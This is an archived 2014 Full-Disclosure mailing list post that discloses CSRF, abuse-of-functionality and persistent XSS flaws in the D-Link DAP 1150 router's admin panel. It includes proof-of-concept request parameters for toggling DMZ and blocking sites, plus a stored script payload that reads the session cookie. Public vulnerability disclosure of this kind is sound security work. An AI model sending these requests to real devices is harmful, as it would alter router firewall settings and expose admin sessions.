lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 18 Apr 2014 23:49:23 +0300
From: "MustLive" <>
To: <>,
Subject: [FD] CSRF, AoF and XSS vulnerabilities in D-Link DAP 1150

Hello list!

In 2011 and beginning of 2012 I wrote about multiple vulnerabilities 
(,, in D-Link DAP 1150 (several dozens). 
That time I wrote about vulnerabilities in admin panel in Access Point mode 
and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request 
Forgery, Abuse of Functionality and Cross-Site Scripting vulnerabilities in 
D-Link DAP 1150 (Wi-Fi Access Point and Router).

SecurityVulns ID: 12076.

Affected products:

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This 
model with other firmware versions also must be vulnerable. D-Link ignored 
all vulnerabilities in this device (as in other devices, which I informed 
them about) and still didn't fix them.


I remind you, that in the first report about vulnerabilities in D-Link DAP 
1150 (, I wrote about CSRF in login 
form and other vulnerabilities, which allow to remotely log into admin panel 
for conducting CSRF and XSS attacks inside admin panel.


In section Firewall / DMZ via CSRF it's possible to change settings of DMZ.

Turn on DMZ:{%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Turn off DMZ:{%22enable%22:false,%22ip%22:%22%22}&res_pos=0


In section Control / URL-filter via CSRF it's possible to add, edit and 
delete settings of URL-filters.




Abuse of Functionality (WASC-42):

This functionality can be used to block access to web sites for users of the 
router. Block access to{%22url%22:%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

This is persistent XSS. The code will execute in section Control / 

Attack via add function in parameter res_buf:{%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

I mentioned about these vulnerabilities at my site 

Best wishes & regards,
Administrator of Websecurity web site 

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists